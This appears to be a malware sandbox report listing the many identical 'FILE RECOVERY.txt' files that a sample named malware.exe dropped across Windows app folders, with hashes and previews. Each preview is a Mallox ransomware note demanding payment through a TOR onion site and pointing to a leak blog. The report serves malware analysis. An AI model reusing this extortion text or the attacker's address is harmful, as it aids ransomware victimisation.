                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\RoamingState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\SystemAppData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\TempState\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\25\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\BHVNCPHL\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCookies\ESE\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCookies\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetHistory\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Temp\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
                        SSDEEP:24:a/uI08Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIsWUPR4v0AVCQyYFaH6e:a/uWJ9bZGyV59yUZu0AVCT
                        MD5:3064346A01D087777BCFB33AFB161130
                        SHA1:0FAB19D900E345B654AFEACE14C4FDC2A1C8BABD
                        SHA-256:BD84B0AAA9D346BF0D276B3AA2E4A920930D052627EBCC49673E262DDFCB83BD
                        SHA-512:662CB507091E754BE678C7DFA09CE1ADA6A9A0D9E05F5F35134C73E8AB262562D1F8454EE369D81EDD6696FF27A45FFB063EA82D677481922954465F8B2DE951
                        Malicious:false
                        Preview:Hello....Your files are encrypted and can not be used..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: D867AABCB6CF90E097786850..5) You will see payment information and we can make free test decryption here....Our blog of leaked companies:..wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion....If you are unab

                        C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\TokenBroker\Cache\FILE RECOVERY.txt

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1212
                        Entropy (8bit):4.817204804834761
                        Encrypted:false
